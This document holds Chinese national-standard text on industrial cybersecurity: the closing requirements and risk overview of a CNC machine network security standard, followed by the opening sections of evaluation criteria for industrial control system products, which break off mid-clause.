审计记录应包括时间戳、来源、类别、事件 ID 和事件结果等; c) 设备应允许用户设置审计记录的存储容量; d) 应通过权限控制、加密存储等对设备的审计记录进行保护; e) 应定期备份审计记录,避免受到未预期的删除、修改或覆盖等而丢失审计信息。 6.2.4.2 增强要求 增强要求包括: a) 应能够对时钟同步频率进行配置,按照设定的频率进行系统时钟同步; b) 在审计失败时(包括但不限于软件或硬件出错、审计捕获机制失败、审计存储容量饱和或溢 出),应能够进行告警并能够采取措施(如覆盖最早的审计记录或停止审计日志生成); c) 应能够配置审计存储容量的阈值,当审计记录存储值达到审计存储容量的阈值时应能够进行 告警; d) 应能够为集中审计管理提供接口,将自身生成的审计记录上传; e) 应能够把审计记录写入非易失性存储介质; f) 应能够通过编程接口访问审计记录。 6.3 网络通信设备安全技术要求 6.3.1 身份鉴别 6.3.1.1 基本要求 基本要求包括: a) 应对登录的用户进行身份标识和鉴别,身份标识具有唯一性,身份鉴别信息具有复杂度要求并 定期更换; b) 应具有登录失败处理功能,采取结束会话、限制非法登录次数等措施; c) 当进行远程管理时,应采取必要措施,防止鉴别信息在网络传输过程中被窃听。 6.3.1.2 增强要求 应采用两种或两种以上组合的鉴别技术对用户进行身份鉴别。 注:对于无法支持部署身份鉴别措施的设备,可通过物理访问控制等方式提供补偿控制措施。 6.3.2 访问控制 6.3.2.1 基本要求 基本要求包括: a) 应对登录的用户分配账号和权限; b) 应删除默认账号或修改默认账号的默认口令; c) 应及时删除或停用多余的、过期的账号,避免存在共享账号; d) 应授予管理用户所需的最小权限,实现管理用户的权限分离。 6.3.2.2 增强要求 应进行角色划分,遵循职责分离原则,根据用户的角色仅授予用户所需的最小权限。 注:对于无法支持部署访问控制措施的设备,可通过物理访问控制、人员管理等提供相应的补偿控制措施。 6.3.3 安全审计 6.3.3.1 基本要求 基本要求包括: a) 应启用安全审计功能,审计覆盖到每个用户,对重要的用户行为和重要安全事件进行审计; b) 审计记录应包括但不限于事件的日期和时间、用户、事件类型、事件是否成功及其他与审计相 关的信息; c) 应对审计记录进行保护,定期备份,避免受到未预期的删除、修改或覆盖等。 6.3.3.2 增强要求 应能够对时钟同步频率进行配置,按照设定的频率进行系统时钟同步。 7 网络安全技术要求 7.1 网络架构 7.1.1 基本要求 应将数控网络与管理网络进行逻辑分区,数控网络内部关键网络区域与其他网络区域进行逻辑分 区。宜在数控网络内部划分出 DMZ 区域。 注:逻辑分区可通过划分VLAN 等方式实现,在数控网络内部可以根据设备所处的位置、网络层次、设备完成的生 产功能等进行逻辑分区。 7.1.2 增强要求 应将数控网络和其他网络进行物理隔离。宜在数控网络内部不同区域进行物理隔离。 7.2 边界防护 7.2.1 基本要求 基本要求包括: a) 应监视和控制数控网络和管理网、互联网之间的通信以及数控网络内各区域之间的通信; b) 应在各边界默认拒绝所有网络数据流,仅允许例外的网络数据流; c) 应能够对非授权设备私自连接到数控网络内部的行为进行限制或检查,并进行有效阻断; d) 应能够对数控网络内部用户私自连接到外部网络的行为进行限制或检查,并进行有效阻断。 7.2.2 增强要求 增强要求包括: a) 应在数控网络和管理网络边界、数控网络内部的区域边界部署保护设备,保证跨越边界的访问 和数据通过受控接口进行通信; b) 当数控网络与管理网络的边界防护机制出现操作失效时,应阻止数控网络与管理网络之间的 边界通信; c) 当数控网络内部安全域之间的边界防护机制失效时,应能够进行告警,并确保不影响关键设备 的通信。 7.3 访问控制 7.3.1 基本要求 基本要求包括: a) 在数据传输之前,应能够对通信的双方进行身份鉴别; b) 远程维护数控设备时,应通过可信信道接入,采用单向访问控制措施,不准许从数控设备获取 NC 代码等工艺信息,应采用加密技术防止鉴别信息在网络传输过程中泄露; c) 应通过设定终端接入方式或网络地址范围对通过网络进行管理的终端进行限制; d) 应支持配置非活动时间,超过非活动时间后,应终止远程会话; e) 应在数控设备层和监督控制层之间、监督控制层和管理网络之间部署保护设备对进出网络的 数据流量进行深度解析,对数据流量的源地址、目的地址、源端口、目的端口和协议等信息进行 检查过滤,以允许/拒绝数据包进出数控网络。 7.3.2 增强要求 增强要求包括: a) 不准许通过互联网等公共网络进行远程访问; b) 应能够对 NC 服务器和数控设备之间传输的NC 代码进行内容过滤以防止恶意修改。 7.4 入侵防范 7.4.1 基本要求 基本要求包括: a) 应在数控设备层和监督控制层之间、监督控制层和管理网络之间的关键网络节点处检测、防止 或限制从外部发起的网络攻击行为; b) 应能够通过网络行为分析实现对网络攻击的检测; c) 应在数控设备层和监督控制层之间、监督控制层和管理网络之间的关键网络节点处检测和限 制从内部发起的网络攻击行为; d) 应能够对检测到的入侵行为进行告警。 7.4.2 增强要求 增强要求包括: a) 应能够通过网络行为分析实现对未知的新型网络攻击的检测; b) 当检测到攻击行为时,应能够记录包括但不限于攻击源 IP、攻击类型、攻击对象、攻击时间等 信息。 7.5 无线使用控制 7.5.1 基本要求 基本要求包括: a) 应能够对数控网络中参与无线通信的设备进行唯一标识和鉴别; b) 应能够对数控网络中进行的无线传输进行加密; c) 应能够对数控网络中无线连接的使用进行授权验证和监控。 7.5.2 增强要求 应能够识别在数控网络中使用的未经授权的无线设备,并告警。 7.6 安全审计 7.6.1 基本要求 基本要求包括: a) 应在数控网络和管理网络、数控设备层和监督控制层之间的关键网络节点处采取审计机制进 行安全审计,安全审计应包括但不限于流量审计、协议审计、内容审计、行为审计; b) 应允许用户配置审计记录的存储容量; c) 审计记录应包括但不限于时间戳、来源、类别、协议类型、事件标识和事件结果; d) 在审计失败时(包括但不限于软件或硬件出错、审计捕获机制失败、审计存储容量饱和或溢出) 应能够进行告警并能够采取恰当的措施(如覆盖最早的审计记录或停止审计日志生成); e) 应通过加密存储、权限控制、身份鉴别等方式保护审计信息和审计工具,防止其在未授权情况 下被获取、修改和删除; f) 应定期备份审计记录,避免受到未预期的删除、修改或覆盖等而丢失审计信息; g) 应保护时间源防止非授权改动, 一旦改动则生成审计事件。 7.6.2 增强要求 增强要求包括: a) 应能够对数控设备的远程访问提供全面的审计记录,包括但不限于访问时间、访问地址、访问 人员、具体操作内容等; b) 应能够配置审计存储容量的阈值,当审计记录存储量达到审计存储容量的阈值时应能够进行 告警; c) 应能够对时钟同步频率进行配置,按照设定的频率进行系统时钟同步; d) 应能够为集中审计管理提供接口,将生成的审计记录上传; e) 应能够把审计记录写入非易失性存储介质; f) 应能够通过编程接口访问审计记录。 7.7 集中管控 7.7.1 基本要求 无。 7.7.2 增强要求 增强要求包括: a) 应划分出特定的管理区域,对分布在数控网络中的安全设备或安全组件进行管理; b) 应能够建立一条安全的信息传输路径,对数控网络中的安全设备或安全组件进行管理; c) 应对网络链路、安全设备、网络通信设备、NC 服务器、采集服务器、数控设备等的运行状况进 行集中监控; d) 应对分散在各个设备上的审计数据进行收集汇总和集中分析; e) 应对安全策略、恶意代码、补丁升级、系统日志等安全相关事项进行集中管理; f) 应对数控网络中发生的各类安全事件进行识别、告警和分析。 8 应用安全技术要求 8.1 身份鉴别 8.1.1 基本要求 基本要求包括: a) 应能够唯一地标识和鉴别登录采集服务器、NC 服务器、数控设备应用软件的用户; b) 应能够通过设置口令的最小长度和多种字符类型以达到强制配置采集服务器、NC 服务器、数 控设备应用软件用户的口令强度; c) 应通过加密方式存储用户口令; d) 应能够对采集服务器、NC 服务器、数控设备应用软件的用户组、角色进行唯一标识; e) 对采集服务器、NC 服务器、数控设备应用软件应在配置时间周期内,对连续无效的访问尝试 次数设置阈值,当访问尝试次数超出阈值时,应能进行告警并在规定的时间内进行锁定或者直 到管理员解锁。 8.1.2 增强要求 增强要求包括: a) 应防止采集服务器、NC 服务器、数控设备应用软件已有的用户账号重复使用同一口令; b) 应限制采集服务器、NC 服务器、数控设备应用软件用户口令的最长和最短有效期; c) 应提供两种或两种以上的鉴别技术来进行身份鉴别,其中至少有一种身份鉴别信息是不可伪 造的; d) 应能够隐藏鉴别过程中的鉴别信息反馈。 8.2 访问控制 8.2.1 基本要求 基本要求包括: a) 应对登录 NC 服务器、采集服务器、数控设备上的应用软件的用户分配账号和权限,遵循职责 分离原则,根据用户的角色仅授予用户所需的最小权限。 b) 应支持 NC 服务器、采集服务器、数控设备上的应用软件的授权用户管理所有账号,包括添加、 激活、修改、禁用和删除账号。 c) 应支持重命名 NC 服务器、采集服务器、数控设备上的应用软件的默认账号或修改这些账号的 默认口令。 d) 应支持删除或禁用 NC 服务器、采集服务器、数控设备上的应用软件的多余或过期的账号,避 免存在共享账号。 e) 应支持配置非活动时间周期,对 NC 服务器、采集服务器、数控设备上的应用软件,应在非活动 时间周期后自动启动或通过手动启动会话锁定防止进一步访问。会话锁定应一直保持有效, 直到发起会话的人员或其他授权人员使用适当的身份标识和鉴别重新建立访问。 f) 对 NC 服务器、采集服务器、数控设备上的应用软件应支持授权用户或角色对所有用户的权限 映射进行规定和修改。 8.2.2 增强要求 增强要求包括: a) 应支持统一管理所有账号; b) 应删除多余或无效的访问控制规则,优化访问控制列表,使访问控制规则数量最小化; c) 应支持授权人员配置访问控制策略,访问控制策略规定用户对资源的访问规则。 8.3 资源控制 8.3.1 基本要求 应能够对软件进程限制并发会话数量,并且会话数量可配置。 8.3.2 增强要求 增强要求包括: a) 应限制单个用户对系统资源的最大或最小使用限度; b) 应提供服务优先级设定功能,并在安装后根据安全策略设定访问账号优先级,根据优先级分配 系统资源。 8.4 软件容错 8.4.1 基本要求 基本要求包括: a) 应能够检查通过人机接口输入的内容是否符合系统设定要求; b) 在故障发生时,应能够继续提供基本功能。 8.4.2 增强要求 当攻击后正常的操作不能保持时,应能够设定输出为预定义状态。 8.5 安全审计 8.5.1 基本要求 基本要求包括: a) 应对包括但不限于用户登录、用户对 NC 代码的操作等用户行为、系统资源的异常使用和重要 系统命令等重要的安全事件进行审计; b) 审计记录应包括但不限于时间戳、来源、类别、事件标识和事件结果等; c) 应通过权限控制、加密等方式保护审计信息,防止其在未授权情况下被获取、修改和删除; d) 应定期备份审计记录,避免受到未预期的删除、修改或覆盖等而丢失审计信息。 8.5.2 增强要求 增强要求包括: a) 应能够对时钟同步频率进行配置,按照设定的频率进行系统时钟同步; b) 应能够设置审计存储容量的阈值,当审计记录存储值达到阈值时,应进行告警; c) 应能够把审计记录写入不易修改、不易删除的存储介质; d) 应能够为集中审计管理提供接口,将自身生成的审计记录上传; e) 应对审计进程进行保护,防止非法中断; f) 应支持通过编程接口访问审计记录。 9 数据安全技术要求 9.1 数据完整性 9.1.1 基本要求 基本要求包括: a) 应采用校验码技术或密码技术保证传输的 NC 代码及设备状态等信息的完整性; b) 应能够检测、记录、报告和防止对存储介质中的 NC 代码及设备状态等信息的未经授权的 更改; c) 应采用校验码技术或密码技术保证 NC 代码、设备状态、审计记录等信息在存储过程中的完 整性; d) 应支持国家密码管理主管部门批准使用的密码算法,使用国家密码管理主管部门认证核准的 密码产品,遵循相关密码国家标准和行业标准。 9.1.2 增强要求 增强要求包括: a) 应能够识别通信过程中信息是否被修改; b) 在完整性验证过程中发现差异时,应能够自动通知指定人员。 9.2 数据保密性 9.2.1 基本要求 基本要求包括: a) 应对工艺文件、NC 代码等信息的传输进行加密保护; b) 应对工艺文件、NC 代码、审计记录等信息的存储进行加密保护; c) 应支持国家密码管理主管部门批准使用的密码算法,使用国家密码管理主管部门认证核准的 密码产品,遵循相关密码国家标准和行业标准。 9.2.2 增强要求 增强要求包括: a) 应对穿过任何区域边界传输的数据进行加密保护; b) 应对存储数据进行加密保护。 9.3 数据备份恢复 9.3.1 基本要求 基本要求包括: a) 应设置安全策略定期对存储在 NC 服务器上的 NC 代码、工艺文件、审计数据以及系统级和用 户级的信息进行数据备份; b) 应验证备份机制的可靠性。 9.3.2 增强要求 增强要求包括: a) 应支持设置备份频率,并根据设定的频率自动进行备份; b) 在受到破坏或发生失效后,应能够恢复和重构设备到一个已知的安全状态。 9.4 剩余信息保护 9.4.1 基本要求 基本要求包括: a) 清除不再使用的、退役组件上的工艺文件、NC 代码等敏感信息; b) 应保证用户的鉴别信息所在的存储空间被释放或重新分配前得到完全清除。 9.4.2 增强要求 应保证存有 NC 代码、工艺文件等敏感信息的存储空间被释放或重新分配前得到完全清除。 数控网络包括数控设备层和监督控制层。数控设备层中是各类通过有线通信或无线通信方式联网 的数控设备。通过数控网络可以实现 NC 代码的集中管理、数控设备的启停控制以及数控设备加工状 态的自动采集。监督控制层中是各类数据采集服务器和 NC 服务器。根据生产规模的不同,NC 服务 器、采集服务器可能会分级部署,如(厂级)NC 服务器、(车间级)NC 子服务器,(厂级)采集服务器、(车 间级)采集子服务器。 监督控制层的服务器和运营管理层的服务器进行信息交互。 PDM 实现设计图纸、工艺文件、加工 程序的集中管理。企业的设计图纸、工艺文件、加工程序可以分散在 CAD 、CAM 、CAPP 等不同的系统 中进行管理。NC 服务器从运营管理层系统获取设计图纸、工艺文件以及定型的 NC 代码并进行存储; 根据 MES 下达的生产任务向数控设备下发数控加工程序。采集服务器接收数控设备采集的加工状态 信息并将设备加工状态信息反馈给 MES 系统。数控设备根据预先编制的程序指令,控制生产过程的 运行,采集设备运行状态信息传送给采集服务器。 数控网络面临的信息安全风险 数控网络存在的信息安全风险主要体现在如下方面: a) 网络安全风险:数控网络在与管理网连接过程中,由于很少采用边界防护措施,缺乏按照业务 类别进行网络区域边界隔离的部署,而导致其容易引入管理网中的安全风险;数控设备经常需 要远程维护,且部分数控网络中存在无线网络,若管理网络某处存在病毒,极易感染与其连接 的其他数控网络。 b) 设备安全风险:在数控网络中采集服务器、NC 服务器、数控设备以及网络通信设备普遍存在 弱(无)口令、漏洞无法及时修复、USB 口缺乏管控的情况,使这些设备容易受到病毒或黑客的 攻击,导致敏感数据外泄或 NC 代码遭到篡改。 c) 应用安全风险:数控网络中应用系统普遍存在弱口令、身份鉴别措施脆弱、软件自身存在安全 漏洞和自身安全措施较少等问题,容易受到病毒或黑客的攻击,导致数控网络中的应用系统崩 溃或敏感数据和 NC 代码泄露或遭到篡改。 d) 数据安全风险:数控网络中的网络、设备和应用本身存在的问题容易导致数控网络中敏感数据 以及 NC 代码泄露。数控网络中数据的产生、使用、存储等方面缺乏防护,导致数据的完整性 和机密性容易受到破坏。 e) 安全管控风险:数控网络中部署的各类安全设备缺乏统一的安全管控,难以及时发现和阻断病 毒和网络攻击,导致容易出现数控网络中的敏感数据泄露或生产业务中断等风险。
standards
信息安全技术 工业控制系统产品信息 安全通用评估准则 Information security technology—Common criteria for industrial control system products security 信息安全技术 工业控制系统产品信息 安全通用评估准则 1 范围 本标准定义了工业控制系统产品信息安全评估的通用安全功能组件和安全保障组件集合,规定了 工业控制系统产品的安全要求和评估准则。 本标准适用于工业控制系统产品安全保障能力的评估,产品安全功能的设计、开发和测试也可参照 使用。 2 规范性引用文件 下列文件对于本文件的应用是必不可少的。凡是注日期的引用文件,仅注日期的版本适用于本文 件。凡是不注日期的引用文件,其最新版本(包括所有的修改单)适用于本文件。 GB/T 18336.1—2015 信息技术 安全技术 信息技术安全评估准则 第1部分:简介和一般模型 GB/T 18336.2—2015 信息技术 安全技术 信息技术安全评估准则 第2部分:安全功能组件 GB/T 18336.3—2015 信息技术 安全技术 信息技术安全评估准则 第3部分:安全保障组件 GB/T 25069—2010 信息安全技术 术语 GB/T 30270—2013 信息技术 安全技术 信息技术安全性评估方法 3 术语和定义 GB/T18336.1—2015 和 GB/T 25069—2010界定的以及下列术语和定义适用于本文件。 3.1 工业控制系统 industrial control system 多种工业生产中使用的控制系统。 注1:包括监控和数据采集系统(SCADA)、分布式控制系统(DCS)、可编程逻辑控制器(PLC)等,现已广泛应用在工 业部门和关键基础设施中。 注2: 改写GB/T 32919—2016,定义3.1。 3.2 工控上位机 industrial control host 在工业控制环境中,管理、控制工业控制设备的主机。 注:通常运行通用的操作系统,如Windows、Unix/Linux等。 3.3 工业控制设备 industrial control device 对工业生产过程及装置进行检测与控制的设备。 3.4 工业控制协议 industrial control protocol 工业控制系统中,工控上位机与工业控制设备之间以及工业控制设备与工业控制设备之间的通信 报文规约。 注:通常包括模拟量和数字量的读写控制。 4 缩略语 GB/T18336.1—2015 界定的以及下列缩略语适用于本文件。 CM: 配置管理(Configuration Management) DCS: 分布式控制系统(Distributed Control System) ETR: 评估技术报告(Evaluation Technical Report) HMI: 人机界面(Human Machine Interface) ICS:工业控制系统(Industry Control System) IT: 信息技术(Information Technology) PLC: 可编程逻辑控制器(Programmable Logic Controller) RTU: 远程终端单元(Remote Terminal Unit) ST: 安全目标(Security Target) SFR: 安全功能要求(Security Functional Requirement) TOE: 评估对象(Target of Evaluation) TSF:TOE 安全功能(TOE Security Functionality) TSFI:TSF 接 口(TSF Interface) 5 概述 本标准主要包括评估对象、扩展组件定义、工业控制系统产品安全要求和工业控制系统产品安全评 估准则等。本标准凡涉及采用密码技术解决机密性、完整性、真实性、不可否认性的应遵循密码相关国 家标准和行业标准。 第6章描述了本标准适用的评估对象,包括但不限于 ICS 控制类产品和ICS 网络安全类产品。 第7章参考GB/T18336.2—2015 安全功能组件、GB/T18336.3—2015 安全保障组件相关要求,围 绕 ICS 产品与传统 IT 产品的差异(参见附录 A), 针对 ICS 产品的特性,对组件进行了扩展和重新定 义,扩展和重新定义组件在组件名称后加上“_EXT” 表示,对新增扩展组件要求的描述用粗体表示,对 组件要求中选择/赋值的选项用斜体表示。 第8章基于安全问题(参见附录 B)定义了适用于 ICS 产品的通用安全要求,开发者根据 TOE 的预 期使用环境及边界定义,根据威胁分析结果选择适用的安全功能要求和安全保障等级。在选择安全功 能组件时,应考虑到组件的依赖关系。 第9章描述了工业控制系统产品评估准则。 6 评估对象 本标准适用于采用信息技术的工业控制系统产品,产品类型包括但不限于: a) ICS 控制类产品:PLC、DCS、RTU、HMI 等; b) ICS 网络安全类产品:工控防火墙、网闸、主机防护设备、监测审计设备等。 TOE 被定义为一组可能包含指南的软件、固件和/或硬件的集合。TOE 的定义较灵活,未局限于 公共理解的工业控制系统产品,TOE 可以是一个产品、 一个产品的一部分、 一种不可能形成产品的独特 技术等。因此对于TOE 的范围确定尤为重要,对 TOE 只包含产品某部分的评估不应与整个产品的评 估相混淆。对于产品不涉及信息技术的部分可以不纳入评估范围,如对于未采用通信及信息处理等信息技术的工业控制系统执行机构等产品是不适合作为评估对象的。 对于存在多种方法配置的产品,如以不同的方法安装、使用不同的启用或禁用选项等,应明确 TOE 的安全配置,其中每种配置应满足 TOE 的指定要求,并写入 TOE 指南文档,TOE 指南(仅允许一种配 置或在安全相关方面没有不同的配置)通常与产品指南(允许多种配置)有所不同。 7 扩展组件定义 7.1 安全组件扩展列表 安全功能组件扩展如表1所示。 表 1 安全功能扩展组件列表 安全功能类 组件标识符 组件名称 FAU类:安全审计 FAU_SAA_EXT.5 基于白名单策略的异常检测 FAU_SAA_EXT.6 工业控制协议解析 FAU_SAR_EXT.4 审计数据报送 FDP类:用户数据保护 FDP_IDP_EXT.1 输入数据验证 FDP_IDP_EXT.2 输入数据双重确认 FDP_SDI_EXT.1 软件/固件和信息完整性 FDP_SDC_EXT.1 存储数据保密性 FDP_DTI_EXT.1 TOE与外部实体传送数据完整性 FDP_DTI_EXT.2 TOE内部传送数据完整性 FDP_DTC_EXT.1 TOE与外部实体传送数据保密性 FDP_DTC_EXT.2 TOE内部传送数据保密性 FIA类:标识和鉴别 FIA_UAU_EXT.1 外部实体鉴别 FIA_UID_EXT.3 唯一性标识 FPT类:TSF保护 FPT_PHP_EXT.4 物理环境要求 FPT_PHP_EXT.5 物理篡改防护 FPT_FLS_EXT.2 确定性输出 FPT_STM_EXT.2 时间同步 FRU类:资源利用 FRU_RUB_EXT.1 数据备份 安全保障组件扩展如表2所示。 表 2 安全保障扩展组件列表 安全保障类 组件标识符 组件名称 ATE类:测试 ATE_TES_EXT.1 测试人员 ATE_TES_EXT.2 独立的测试人员 7.2 安全功能组件扩展定义 7.2.1 安全审计分析(FAU_SAA) 7.2.1.1 类别 所属类别为 GB/T 18336.2—2015中定义的 FAU 类:安全审计。 7.2.1.2 族行为 本族定义了一些采用自动化手段分析系统活动和审计数据以寻找可能的或真正的安全侵害的要 求。这种分析通过入侵检测来实现,或对潜在的安全侵害作出自动响应。 基于检测而采取的动作,可用FAU_ARP “安全审计自动响应”族来规范。 ICS 的基于白名单的监视探测保护策略与原有的“基于轮廓的异常检测”不同,其内容不仅包含用 户操作行为,还包括进程、信息流等其他实体,故扩展了组件FAU_SAA_EXE.5 “基于白名单策略的异 常监测”。基于ICS 状态数据和通信数据进行行为分析前,需要对工业控制协议进行解析,本族扩展了 组件 FAU_SAA_EXT.6 “工业控制协议解析”。 7.2.1.3 组件层次 FAU_SAA_EXT.5 “基于白名单策略的异常监测”,提供基于信任列表的对异常行为进行监测的 能力。 FAU_SAA_EXT.6 “工业控制协议解析”,要求具备解析工业控制协议的能力。 7.2.1.4 FAU_SAA_EXT.5 管理 FMT 中的管理功能可考虑下列行为: 对信任列表的维护(添加、修改、删除)。 7.2.1.5 FAU_SAA_EXT.6 管理 尚无预见的管理活动。 7.2.1.6 FAU_SAA_EXT.5 审计 如果 PP/ST 中包含 FAU_GEN “安全审计数据产生”,下列行为应是可审计的: a) 最小级:开启和关闭任何分析机制; b) 最小级:通过工具软件实现自动响应。 7.2.1.7 FAU_SAA_EXT.6 审计 尚无预见的可审计事件。 7.2.1.8 FAU_SAA_EXT.5 基于白名单策略的异常检测 从属于:无其他组件。 依赖关系:无依赖关系。 FAU_SAA_EXT.5.1 TSF应能定义和维护基于[赋值:被信任的实体]的信任列表,并仅允许符合信 任列表要求的行为通过, 一旦检测到异常,应采取[赋值:动作列表]。 应用说明: a) 被信任的实体可以是应用程序、用户组、信息流特征等; b) 动作列表可以赋值无。 7.2.1.9 FAU_SAA_EXT.6 工业控制协议解析 从属于:无其他组件。 依赖关系:无依赖关系。 FAU_SAA_EXT.6.1 TSF应支持[赋值:工业控制协议名称]的解析,解析协议的深度包括[选择:工 业控制协议的协议名称、指令格式、指令类型和指令参数、[赋值:其他参数]]。 应用说明: a) 常见的工业控制协议包括(但不限于)Modbus/TCP 协议、OPC Classic 协议、DNP3.0 协议、 SIEMENS S7Comm 协议、EtherNet/IP 协议、EtherCAT 协议、PowerLink 协议和 Profinet 协 议等;互联网协议主要包括(但不限于)HTTP 、FTP 、TELNET 、SNMP 等协议。除上述协议 外,还可以支持串行总线网络、工业无线网络、工业互联网等与 TCP/IP 网络技术不同的协议。 b) 赋值协议名称可以是一种或多种。 c) 选择可以选择一个或多个。 7.2.2 安全审计查阅(FAU_SAR) 7.2.2.1 类别 所属类别为 GB/T 18336.2—2015 中定义的 FAU 类:安全审计。 7.2.2.2 族行为 本族定义了一些有关审计工具的要求,授权用户可使用这些审计工具查阅审计数据。 由于部分ICS 产品存储和处理能力有限,可采用集中审计模式,本族扩展了 FAU_SAR_EXT.4 “审计数据报送”组件。 7.2.2.3 组件层次 FAU_SAR_EXT.4 “审计数据报送”,TSF 可将审计发数据报送给其他设备。 7.2.2.4 FAU_SAR_EXT.4 管理 FMT 中的管理功能可考虑下列行为: a) 维护(删除、修改、添加)接受报送审计数据的设备组; b) 维护根据审计数据属性过滤需要发送的审计数据。 7.2.2.5 FAU_SAR_EXT.4 审计 如果 PP/ST 中包含 FAU_GEN“安全审计数据产生”,下列行为应是可审计的: 基本级:审计数据报送的失败动作。 7.2.2.6 FAU_SAR_EXT.4 审计数据报送 从属于:无其他组件。 依赖关系:FTP_ITC.1 可信信道。 FAU_SAR_EXT.4.1 TSF应能够将自身审计记录通过可信信道报送给其他设备,进行更高级别的 审计。 应用说明:有些嵌入式设备的审计信息存储容量是有限的,宜从系统层面使用工具对系统范围内所有设备和主机的审计记录进行过滤和分析,设备的审计信息格式应是统一的。 7.2.3 输入数据保护(FDP_IDP_EXT) 7.2.3.1 类别 所属类别为 GB/T 18336.2—2015中定义的 FDP 类:用户数据保护。 7.2.3.2 族行为 本族为扩展的FDP_IDP 族,以描述 TOE 关键数据安全功能的保护能力。要求对输入到 TOE 的 关键数据或动作进行输入内容和语法的合法性、安全性进行验证,并对关键操作执行双重批准确认。 7.2.3.3 组件层次 FDP_IDP.EXT.1 “输入数据验证”,要求检测输入信息的安全性和合法性, 一旦检测到错误后, TOE 应采取相关的动作。 FDP_IDP.EXT.2 “输入数据双重确认”,要求对输入到 TOE 的关键数据或动作执行双重确认 操作。 7.2.3.4 FDP_IDP_EXT.1 管理 FMT 中的管理功能可考虑下列行为: 对行为的管理(添加、删除或修改)。 7.2.3.5 FDP_IDP_EXT.2 管理 尚无预见的管理活动。 7.2.3.6 FDP_IDP_EXT.1 审计 如果 PP/ST 中包含 FAU_GEN “安全审计数据产生”,下列行为应是可审计的: 最小级:检测到错误后而采取的动作。 7.2.3.7 FDP_IDP_EXT.2 审计 如果 PP/ST 中包含 FAU_GEN“安全审计数据产生”,下列行为应是可审计的: a) 最小级:双重确认的成功执行; b) 基本级:双重确认的未成功执行。 7.2.3.8 FDP_IDP.EXT.1 输入数据验证 从属于:无其他组件。 依赖关系:无依赖关系。 FDP_IDP_EXT.1.1 TOE 应检测输入信息的安全性和合法性, 一旦检测到错误后,TOE 应采取相关 的动作[赋值:动作列表]。 应用说明: a) 输入信息包括但不限于应用输入(如 I/O 输入或其他传输设备传输的数据)和参数配置(如授 权人员通过配置界面/控制面板输入的参数); b) 系统输入信息的检测包括超出预定义字段值的范围、无效字符、缺失或不完整的数据和缓冲 区溢出等。 7.2.3.9 FDP_IDP_EXT.2 输入数据双重确认 从属于:无其他组件。 依赖关系:无依赖关系。 FDP_IDP_EXT.2.1 TOE 应对输入到 TOE 的关键数据或动作执行双重确认操作。 应用说明: a) 当需要很高级别可靠性和正确性执行的操作时,限制双重确认是一个普遍接受的良好实践; b) 要求双重批准强调正确操作失败所导致后果的严重性。如对关键工业过程的设定值进行改 变或紧急关停装置等。 7.2.4 存储数据的完整性(FDP_SDI) 7.2.4.1 类别 所属类别为 GB/T 18336.2—2015 中定义的 FDP 类:用户数据保护。 7.2.4.2 族行为 本族将存储数据的完整性扩展到了固件、可执行代码等在初始启动阶段、运行阶段或更新阶段的完 整性保护。 7.2.4.3 组件层次 FDP_SDI_EXT.1 “软件/固件和信息完整性”,要求 TOE 在初始阶段、运行阶段或更新阶段可以对 固件、可执行代码、关键配置数据等的完整性错误进行检测。 7.2.4.4 FDP_SDI_EXT.1 管理 尚无预见的管理活动。 7.2.4.5 FDP_SDI_EXT.1 审计 如果 PP/ST 中包含 FAU_GEN“安全审计数据产生”,下列行为应是可审计的: a) 最小级:检查数据/固件/代码完整性的成功尝试,包括检测的结果; b) 基本级:检查数据/固件/代码的所有尝试,如果成功的话,还包括加测的结果; c) 详细级:出现的完整性错误的类型。 7.2.4.6 FDP_SDI_EXT.1 软件/固件和信息完整性 从属于:无其他组件。 依赖关系:无依赖关系。 FDP_DSI.EXT.1.1 TOE 应在[选择:初始化启动、正常运行期间、代码/固件更新]时,对 TOE[选择: 关键配置数据、可执行代码、固件]的未授权修改、删除或插入等完整性错误进行检测。 FDP_DSI.EXT.1.2 当检测到完整性错误后,TOE 应采取相关的动作[赋值:动作列表]。 应用说明: a) 本要求针对当存储数据、软件/固件被未授权更改后的检测和防护; b) 更新中检测到加载的不是厂商授权版本情况应进行防护。 7.2.5 存储数据的保密性(FDP_SDC_EXT) 7.2.5.1 类别 所属类别为GB/T18336.2—2015 中定义的 FDP 类:用户数据保护。 7.2.5.2 族行为 本族为扩展的 FDP_SDC 族,以描述 TSF 可保护敏感数据安全的能力。规定了存储数据的保密 性,如鉴别数据、密钥、证书、关键配置等敏感数据。 7.2.5.3 组件层次 FDP_SDC.EXT.1 “存储数据的保密性”,要求有能力保护存储在 TOE 中的敏感数据不被未授权 泄露。 7.2.5.4 FDP_SDC_EXT.1 管理 尚无预见的管理活动。 7.2.5.5 FDP_SDC_EXT.1 审计 尚无预见的审计活动。 7.2.5.6 FDP_SDC_EXT.1 存储数据保密性 从属于:无其他组件。 依赖关系:无依赖关系。 FDP_SDC_EXT.1.1 TSF 应具备能力保护存储在 TSF 中的敏感数据不被未授权泄露。 应用说明:保密性机制可以采取非明文或加密存储等。 7.2.6 数据传输完整性(FDP_DTI_EXT) 7.2.6.1 类别 所属类别为 GB/T18336.2—2015 中定义的 FDP 类:用户数据保护。 7.2.6.2 族行为 本族为扩展的 FDP_DTI 族,确保数据在 TOE 内部及TOE 与外部实体之间传送时不被非法篡改, 数据的错误传输对 ICS 系统基本功能的运行会产生严重影响,TOE 应能提供数据完整性保护及验证数 据完整性的能力。 7.2.6.3 组件层次 FDP_DTI_EXT.1“TOE 与外部实体传送数据完整性”,TOE 应在与外部实体之间发送及接收数据 时提供数据完整性保护的能力。 FDP_DTI_EXT.2“TOE 内部传送数据完整性”,TOE 应在内部发送和接收数据时提供数据完整性 保护的能力。 7.2.6.4 FDP_DTI_EXT.1 、FDP_DTI_EXT.2 管理 尚无预见的管理活动。 7.2.6.5 FDP_DTI_EXT.1、FDP_DTI_EXT.2 审计 如果 PP/ST 中包含 FAU_GEN“安全审计数据产生”,下列行为应是可审计的: 最小级:数据传输失败的记录。 7.2.6.6 FDP_DTI_EXT.1 TOE 与外部实体传送数据完整性 从属于:无其他组件。 依赖关系:无依赖关系。 FDP_DTI_EXT.1.1 当 TOE 传送[赋值 :数据类型]到[赋值:外部实体]时,TOE 应能对所传送数据 进行完整性保护(如采用校验码或密码算法等)。 FDP_DTI_EXT.1.2 当 TOE 接收[赋值:外部实体]传送数据时,TOE 应能检测所传送数据的修改、 替换、重排、重放、删除、延迟等完整性错误,当检测到完整性错误后,TOE 应采取相应的动作[赋值:动 作列表]。 应用说明: a) 赋值数据类型,如鉴别数据、控制数据等; b) 赋值与 TOE 通信的外部实体,如果有多个,应进行识别,然后分别进行描述; c) 赋值动作列表,如丢弃接收到的错误数据等。 7.2.6.7 